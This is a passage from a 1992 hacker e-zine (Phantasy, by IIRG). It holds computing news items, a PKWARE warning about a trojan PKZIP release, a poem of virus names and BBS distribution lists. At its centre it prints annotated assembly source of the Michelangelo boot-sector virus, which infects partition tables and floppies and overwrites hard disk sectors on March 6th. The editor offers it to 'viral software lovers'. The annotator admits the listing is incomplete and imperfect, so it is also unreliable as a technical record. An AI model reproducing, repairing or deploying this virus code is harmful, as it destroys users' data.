  772.  service in major metropolitan areas across the nation.  Using
  773.  RAM's service, companies exchange two-way messages and data with
  774.  field personnel equipped with mobile, portable, or handheld
  775.  terminals.  RAM Mobile Data Ltd. operates a similar, compatible
  776.  system in the United Kingdom.  RAM's radio-based data
  777.  communications network architecture is Mobitex, an international,
  778.  open standard supplied by Ericsson.
  779.   RAM has exclusive use of the Mobitex technology in the
  780.  United States. Mobitex was developed by Ericsson Mobile
  781.  Communications AB and Swedish Telecom. Digital and Ericsson last
  782.  year signed a cooperation agreement under which the two companies
  783.  will develop software tools for the integration of Digital's
  784.  products with the Mobitex network.
  785.  
  786.   ALL-IN-1, DECmobile, the Digital logo, and Mobilizer for ALL-IN-1 are
  787.   trademarks of Digital Equipment Corporation.
  788.   Mobitex is a registered trademark of Swedish Telecom
  789.   MS-DOS is a registered trademark of Microsoft Corporation.
  790.   RAM Mobile Data's legal name is RAM Mobile Data USA Limited Partnership
  791.  
  792. ------------------------------------------------------------------------------
  793.  
  794.                HONEST OFFICER!, HE SAID HE BOUGHT THE STUFF
  795.  
  796.   Microsoft and the FBI recently raided four Silicon Valley companies
  797.  seizing bootleg copies of MS-DOS 5.0 and Windows 3.0 as well as associated
  798.  manuals with a street value of more than $180,000. The Tip-off came when
  799.  distributors tried to sell MS-DOS 5.0 seperately.
  800.  
  801. -------------------------------------------------------------------------------
  802.  
  803.                        BIG MAC ATTACK FOILED
  804.  
  805.   Two Cornell University students have been accused of creating a computer
  806.  virus called MBDF-A, that infected computers around the world.
  807.   David Blumenthal,20 and Mark Pilgrim,19 face a maximum four years in prison
  808.  for allegedly hiding the virus in three Macintosh computer games that were
  809.  sent via modem from Cornell's computer center to an archive at Stanford.
  810.   Macintosh PC's across the USA,Great Britain,and Japan were infected when
  811.  users downloaded the games. Once in the Macs the virus destroyed the operating
  812.  system.
  813.   The two were arrested on misdemeanor charges which have been increased to
  814.  felonies because the virus may have caused more than $1,000 in Damage.
  815.  
  816. -------------------------------------------------------------------------------
  817. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  818.  
  819.  Section [8]: FOR THE PEOPLE
  820.               Files Collected from BBS's Across the country
  821.               By You the Computer User!
  822.               Edited By: Mercenary
  823.  
  824. -------------------------------------------------------------------------------
  825.  IIRG NOTE: This source code file was floating around for some time
  826.             we provide it here for the programmer or viral software lover.
  827. -------------------------------------------------------------------------------
  828. ;
  829. ;
  830. ;     Michelangelo
  831. ;     Size: 512
  832. ;     Type: Boot infector
  833. ;     Date of action: March 6th
  834. ;
  835. ;
  836.  
  837. data_1e        equ    4Ch            ; (0000:004C=1DB1h)
  838. data_2e        equ    4Eh            ; (0000:004E=70h)
  839. data_3e        equ    413h            ; (0000:0413=280h)
  840. data_4e        equ    7C05h            ; (0000:7C05=203Ch)
  841. data_5e        equ    7C0Ah            ; (0000:7C0A=49EBh)
  842. data_6e        equ    7C0Ch            ; (0000:7C0C=2A3Ch)
  843. data_7e        equ    7            ; (694E:0007=0)
  844. data_8e        equ    8            ; (694E:0008=0)
  845. data_9e        equ    0Ah            ; (694E:000A=0)
  846. data_11e    equ    7C03h            ; (694E:7C03=0)
  847.   
  848. seg_a        segment
  849.         assume    cs:seg_a, ds:seg_a
  850.   
  851.   
  852.         org    100h
  853.   
  854. mich        proc    far
  855.   
  856. start:                      
  857.         jmp    loc_6 ; (01AF) "This is what you see at sector 0"
  858.         db    0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
  859.         db    0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
  860.         db    50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
  861.         db    0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
  862.         db    4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
  863.         db    9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
  864.         db    9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
  865.         db    2, 0, 58h, 1Fh, 2Eh, 0FFh
  866.         db    2Eh, 0Ah, 0, 50h, 53h, 51h
  867.         db    52h, 1Eh, 6, 56h, 57h, 0Eh
  868.         db    1Fh, 0Eh, 7, 0BEh, 4, 0
  869. loc_1: ;Init registers
  870.         mov    ax,201h
  871.         mov    bx,200h
  872.         mov    cx,1
  873.         xor    dx,dx            ; Zero register
  874.         pushf                ; Push flags
  875.         call    dword ptr ds:data_9e    ; (694E:000A=0)
  876.         jnc    loc_2            ; Jump if carry=0
  877.         xor    ax,ax            ; Zero register
  878.         pushf                ; Push flags
  879.         call    dword ptr ds:data_9e    ; (694E:000A=0)
  880.         dec    si
  881.         jnz    loc_1            ; Jump if not zero
  882.         jmp    short loc_5        ; (01A6)
  883. loc_2: ;Zero registers clear direction
  884.         xor    si,si            ; Zero register
  885.         cld                ; Clear direction
  886.         lodsw                ; String [si] to ax
  887.         cmp    ax,[bx]
  888.         jne    loc_3            ; Jump if not equal
  889.         lodsw                ; String [si] to ax
  890.         cmp    ax,[bx+2]
  891.         je    loc_5            ; Jump if equal
  892. loc_3: ; cmp byte ptr See infected
  893.         mov    ax,301h
  894.         mov    dh,1
  895.         mov    cl,3
  896.         cmp    byte ptr [bx+15h],0FDh
  897.         je    loc_4            ; Jump if equal
  898.         mov    cl,0Eh
  899. loc_4: ;call out all db hiden data
  900.         mov    ds:data_8e,cx        ; (694E:0008=0)
  901.         pushf                ; Push flags
  902.         call    dword ptr ds:data_9e    ; (694E:000A=0)
  903.         jc    loc_5            ; Jump if carry Set
  904.         mov    si,3BEh
  905.         mov    di,1BEh
  906.         mov    cx,21h
  907.         cld                ; Clear direction
  908.         rep    movsw            ; Rep while cx>0 Mov [si]
  909.         mov    ax,301h                 ; to es:[di]
  910.         xor    bx,bx            ; Zero register
  911.         mov    cx,1
  912.         xor    dx,dx            ; Zero register
  913.         pushf                ; Push flags
  914.         call    dword ptr ds:data_9e    ; (694E:000A=0)
  915. loc_5: ;Clear all set
  916.         pop    di
  917.         pop    si
  918.         pop    es
  919.         pop    ds
  920.         pop    dx
  921.         pop    cx
  922.         pop    bx
  923.         pop    ax
  924.         retn
  925. loc_6: ;Load all hiden data
  926.         xor    ax,ax            ; Zero register
  927.         mov    ds,ax
  928.         cli                ; Disable interrupts
  929.         mov    ss,ax
  930.         mov    ax,7C00h
  931.         mov    sp,ax
  932.         sti                ; Enable interrupts
  933.         push    ds
  934.         push    ax
  935.         mov    ax,ds:data_1e        ; (0000:004C=1DB1h)
  936.         mov    ds:data_5e,ax        ; (0000:7C0A=49EBh)
  937.         mov    ax,ds:data_2e        ; (0000:004E=70h)
  938.         mov    ds:data_6e,ax        ; (0000:7C0C=2A3Ch)
  939.         mov    ax,ds:data_3e        ; (0000:0413=280h)
  940.         dec    ax
  941.         dec    ax
  942.         mov    ds:data_3e,ax        ; (0000:0413=280h)
  943.         mov    cl,6
  944.         shl    ax,cl            ; Shift w/zeros fill
  945.         mov    es,ax
  946.         mov    ds:data_4e,ax        ; (0000:7C05=203Ch)
  947.         mov    ax,0Eh
  948.         mov    ds:data_1e,ax        ; (0000:004C=1DB1h)
  949.         mov    ds:data_2e,es        ; (0000:004E=70h)
  950.         mov    cx,1BEh
  951.         mov    si,7C00h
  952.         xor    di,di            ; Zero register
  953.         cld                ; Clear direction
  954.         rep    movsb            ; Rep while cx>0 Mov [si]
  955.         jmp    dword ptr cs:data_11e    ; to es:[di] (694E:7C03=0)
  956.         db    33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
  957.         db    0Eh, 1Fh, 0B8h, 1, 2, 0BBh      ;          cd 13
  958.         db    0, 7Ch, 8Bh, 0Eh, 8, 0
  959.         db    83h, 0F9h, 7, 75h, 7, 0BAh
  960.         db    80h, 0, 0CDh, 13h, 0EBh, 2Bh
  961.         db    8Bh, 0Eh, 8, 0, 0BAh, 0
  962.         db    1, 0CDh, 13h, 72h, 20h, 0Eh
  963.         db    7, 0B8h, 1, 2, 0BBh, 0
  964.         db    2, 0B9h, 1, 0, 0BAh, 80h
  965.         db    0, 0CDh, 13h, 72h, 0Eh, 33h
  966.         db    0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
  967.         db    4Fh, 0ADh, 3Bh, 47h, 2
  968.         db    75h, 49h
  969. loc_7:;check if it is time to nuke
  970.         xor    cx,cx            ; Zero register
  971.         mov    ah,4
  972.         int    1Ah ; Real time clock   ah=func 04h don't work on an xt
  973.                         ; read date cx=year, dx=mon/day
  974.         cmp    dx,306h                 ; See if March 6th
  975.         je    loc_8            ; Jump if equal to nuking subs
  976.         retf                ; Return to launch command.com
  977. loc_8:;get ready
  978.         xor    dx,dx            ; Zero register
  979.         mov    cx,1
  980. loc_9:;run 7 times nuke 31.5 megs of hd
  981.         mov    ax,309h
  982.         mov    si,ds:data_8e        ; (694E:0008=0)
  983.         cmp    si,3
  984.         je    loc_10            ; Jump if equal
  985.         mov    al,0Eh
  986.         cmp    si,0Eh
  987.         je    loc_10            ; Jump if equal
  988.         mov    dl,80h
  989.         mov    byte ptr ds:data_7e,4    ; (694E:0007=0)
  990.         mov    al,11h
  991. loc_10: ;nuke away 
  992.         mov    bx,5000h
  993.         mov    es,bx
  994.         int    13h            ; Disk  dl=drive a: ah=func 03h
  995.                         ;  write sectors from mem es:bx
  996.         jnc    loc_11            ; Jump if carry=0
  997.         xor    ah,ah            ; Zero register
  998.         int    13h            ; Disk  dl=drive a: ah=func 00h
  999.                         ;  reset disk, al=return status
  1000. loc_11: ;rest for loc-9 nuking
  1001.         inc    dh
  1002.         cmp    dh,ds:data_7e        ; (694E:0007=0)
  1003.         jb    loc_9            ; Jump if below
  1004.         xor    dh,dh            ; Zero register
  1005.         inc    ch
  1006.         jmp    short loc_9        ; (0250)
  1007. loc_12:;time to infect a floppie or hard dirve
  1008.         mov    cx,7
  1009.         mov    ds:data_8e,cx        ; (694E:0008=0)
  1010.         mov    ax,301h
  1011.         mov    dx,80h
  1012.         int    13h    ; Disk  dl=drive a: ah=func 03h infect flopie
  1013.                         ;  write sectors from mem es:bx
  1014.         jc    loc_7            ; Jump if carry Set
  1015.         mov    si,3BEh
  1016.         mov    di,1BEh
  1017.         mov    cx,21h
  1018.         rep    movsw            ; Rep while cx>0 Mov [si]
  1019.         mov    ax,301h                 : to es:[di]
  1020.         xor    bx,bx            ; Zero register
  1021.         inc    cl
  1022.         int    13h ; Disk  dl=drive a: ah=func 03h lets infect hd
  1023.                         ;  write sectors from mem es:bx
  1024. ;*        jmp    short loc_13        ;*(02E0)
  1025.         db    0EBh, 32h
  1026.         db    1, 4, 11h, 0, 80h, 0
  1027.         db    5, 5, 32h, 1, 0, 0
  1028.         db    0, 0, 0
  1029.         db    53h, 53h, 20h, 20h, 43h, 4Fh
  1030.         db    4Dh
  1031.         db    58 dup (0)
  1032.         db    55h, 0AAh
  1033.   
  1034. seg_a        ends
  1035.  
  1036. ;Last notes this virus looks like a poor hack job on the stoned virus.
  1037. ;It is kinda cool in the fact that it is hard to get out of the partition table
  1038. ;even if you nuke the partition table it will live on even if you replace it.
  1039. ;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
  1040. ;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
  1041. ;this virus uses int 1ah which doesn't work on an XT system.
  1042. ;the virus isn't actually 512 but that is how much it writes.
  1043. ;it moves the boot area of a floppy to the last sector on the disk
  1044. ;and on a harddrive it moves it to the last sector in the root directory
  1045. ;This should show you all how much the media can over do it on things
  1046. ;since this is really a lame virus,to tell you the truth there is a lot better
  1047. ;ones out there.
  1048. ;This in no way is a complete listing of the code for the virus.
  1049. ;Nor is it the best since i'm not the best at Assembly.
  1050. ;Done by Visionary.
  1051. ;BTW to who ever wrote this virus... Get a life!  
  1052.  
  1053. -------------------------------------------------------------------------------
  1054.  
  1055. 03/16/1992  
  1056.  
  1057.     WARNING!  WARNING!  WARNING!  WARNING!  WARNING!  WARNING!  WARNING!
  1058.     --------------------------------------------------------------------
  1059.  
  1060.     There is a file being circulated on BBS's called PKZ201.ZIP or
  1061.     PKZ201.EXE or similar, and that claims to be version 2.01 of
  1062.     PKZIP but in fact is a hacked version of PKZIP 1.93 Alpha.
  1063.  
  1064.     As of the date of this writing, the latest version of PKZIP is
  1065.     version 1.10. 
  1066.  
  1067.     If you see the files PKZ201.ZIP or PKZ201.EXE on any BBS or
  1068.     on-line system, please ask the SysOp of that system to remove
  1069.     the files IMMEDIATELY, and please contact PKWARE to report
  1070.     where the files were seen.
  1071.  
  1072.     Of course, because of this PKWARE will never release a version
  1073.     of PKZIP with the version number 2.01.
  1074.  
  1075.     If you have any information about the source of PKZ201.EXE or
  1076.     PKZ201.ZIP, please report it to PKWARE immediately, either:
  1077.  
  1078.     by Voice at 414-354-8699
  1079.     by BBS   at 414-354-8670
  1080.     by FAX   at 414-354-8559
  1081.     or by mail:
  1082.  
  1083.                 PKWARE Inc.
  1084.                 9025 N. Deerwood Drive
  1085.                 Brown Deer, WI 53223 USA
  1086.  
  1087.  
  1088.                                              Sincerely,
  1089.  
  1090.  
  1091.                                                 Phil Katz
  1092.                                                 President, PKWARE Inc.
  1093. -------------------------------------------------------------------------------
  1094.  
  1095.  A VIRUS POEM
  1096.  By: Brooks Hilliard
  1097.  
  1098.  There's Beta and Manta,Get Password and CB
  1099.   Amstrad and Leningrad,F-Word and BeBe
  1100.  Haifa,Messina,Enigma,Gergana
  1101.   Tequila,Azuza and Nina,Vienna.
  1102.  There's Smily and Shirly,Israeli and Anthrax
  1103.   and Yankee and Miky,Raubkopi,Oropax.
  1104.  There's Newcom and Checksum and Boojum and Prism
  1105.   and Incom and Phantom and Planinum and Skism.
  1106.  There's Scrambler and Squeaker and Joker,Disk Killer,
  1107.   Filler Despoiler and Green Caterpillar.
  1108.  Theres Jojo,Ohio and Spanish April Fool,
  1109.   Frodo and Turbo,Jerusalem Mule.
  1110.  There's Sadist and Chemist and Cinderella.
  1111.   Burger and Ogre and Finger and Kalah.
  1112.  Azusa,Eliza,Zargosa and Sotcha,
  1113.   Macedonia,Albania,Necrophilia and Gotcha.
  1114.  Theres Palette and Merritt, and Friday the 13th
  1115.   and Saddam and Virdem and Saturday 14th.
  1116.  There's Typo,Empire,and Topo,and Ping Pong,
  1117.   Mosquito,and Fire,and Psycho,and Lao Doung.
  1118.  Theres USSR and Ambulance Car,
  1119.   And Wonder,Surrender and Redstar and Spar
  1120.  Bugares,Vorohezh,Xabaras,and Flash
  1121.   Microbes and Irish,Addidas and Crash.
  1122.  There's Timid,New Zealand,Bloody! and Tiny DI.
  1123.  There's Stupid and Lovechild and Froggie and Lehigh.
  1124.  There's Stoned and Scotts Valley and Happy N.Y.
  1125.  There's Cascade,Black Wizard and also Bad Guy.
  1126.  There's Frere Jacques,Maraudar,Invader,
  1127.   Vacsina Rybka and also Darth Vader.
  1128.  There's Barcelona and Nomenkla-tara,
  1129.   and then Montezuma and Hydra and Cara.
  1130.  There's Music,Icelandic,Generic and Whale,
  1131.  There's Lisbon and Pentagon and Phalcon and Yale.
  1132.   Pirate and Mutant and Fumble and Hello
  1133.  There's Patient and Advent and Michelangelo.
  1134.  That's 130 viruses,smaller and greater
  1135.   If you don't get protected,You'll lose all your data.
  1136.  
  1137.  
  1138. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1139.  
  1140.  Section [9]: IIRG Distribution Sites
  1141.  
  1142.                
  1143.  
  1144.  
  1145.                    //////    //////     ///////     ////////
  1146.                     //        //       //    //    //
  1147.                    //        //       ///////     //   ////
  1148.                   //        //       //    //    //     //
  1149.                ////// *  //////  *  //     // * /////////
  1150.              
  1151.      
  1152.  
  1153.  
  1154.     IIRG World HQ:           Dark Shadows 
  1155.                              19.2/9600 Baud HST
  1156.                              24 Hours a Day
  1157.                              1.2 Gigs Online
  1158.                              (203)-628-9660
  1159.  
  1160.  
  1161.    IIRG Distribution Site 1: Restaurant at the End of the Universe
  1162.                              2400/1200 Baud (3 Nodes!!)
  1163.                              24 hours a day
  1164.                              130 Megs of Files
  1165.                              (203)567-8903 2 Nodes 2400
  1166.                              (203)567-4808 1 Node 1200
  1167.  
  1168.    IIRG Distribution Site 2: The Generic Access BBS
  1169.                              INC New England Regional District HQs
  1170.                              IUD New England Regional District HQs
  1171.                              1.2 gigs online
  1172.                              USR Dual Standard HST
  1173.                              NO Ratios
  1174.                              (508) 281-3961
  1175.  
  1176.    IIRG Distribution Site 3: The Sanitarium
  1177.                              Sysops: Morbid Angel [INC/ACID]
  1178.                                      Spectral Illusion [ACID/RAZOR]
  1179.                              IIRG Distribution Site
  1180.                              ACID Member Board
  1181.                              INC Courier Board
  1182.                              RAZOR 1911 Courier Board
  1183.                              VISA World Headquarters
  1184.                              (817)PRI-VATE
  1185.  
  1186.  
  1187.    IIRG Distribution Site 4: CTHH 666    
  1188.                              2400 - 57.6 Baud   
  1189.                              Sysop: Beelzebub
  1190.                              HAU AB! East Coast Headquarters
  1191.                              Hackers Alliance Of The Underground Abuse
  1192.                              I.I.R.G. Distribution Site
  1193.  
  1194. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1195.  
  1196.  Section [9]: Phantasy Distribution Sites
  1197.  
  1198.  Phantasy's Distribution Site's are continually growing,we apologize if you
  1199.  called a board and didn't find the Mag. Network Distribution Sites will
  1200.  have the Issues first, we suggest calling one of them if a problem does
  1201.  arise.
  1202.  
  1203.  
  1204.   1. Lightning Systems
  1205.      (414) 363-4282
  1206.      Sixty Million Bytes OnLine
  1207.      USRobotics Dual Standard HST/V.32bis
  1208.      2400 thru 14.4k v.32bis/HST
  1209.  
  1210.   2. Sycamore Elite
  1211.      19,200-1200 Baud HST, 24 Hours a day
  1212.      (815) 895-5573
  1213.  
  1214.   3. The Works BBS at (617-861-8976)
  1215.      Largest Text Files BBS in the world, 3500+ text files online.
  1216.      2400-300 Baud, 24 Hours a day
  1217.  
  1218.   4. Pipers Pit BBS            
  1219.      19,200-9600 HST ONLY!!
  1220.      24 Hours a Day
  1221.      THG Distro Site 1300 Megs
  1222.      (203)PRI-VATE [2 Nodes]
  1223.  
  1224.   5. Blitzkrieg BBS                  TAP Magazine
  1225.      (502)-499-8933                  P.O. BOX 20264
  1226.      Home of TAP MAgazine            Louisville,KY. 40250-0264
  1227.  
  1228.   6. The Dickinson Nightlight
  1229.      (713)-337-1452
  1230.      Der WeltanSchauung Distro Site (World View Magazine)
  1231.      Phantasy Distro Site
  1232.  
  1233.   7. Lucid Dreams
  1234.      SysOp: Louis Cypher    Number: (713)522-0709 
  1235.      Running: Flashback  Speed: USR DS 38.4
  1236.      0-1 Day Warez    1400 T-Files
  1237.      300+ Virii  Net: TcH 
  1238.  
  1239.  
  1240. PHANTASY is also available on:
  1241.  
  1242.              1. RIPCO BBS (312)528-5020
  1243.  
  1244.      
  1245. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1246.                        PHANTASY(C) IIRG 1991,1992
  1247.                         May Odin Guide Your Way!
  1248. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1249. Downloaded From P-80 International Information Systems 304-744-2253
  1250.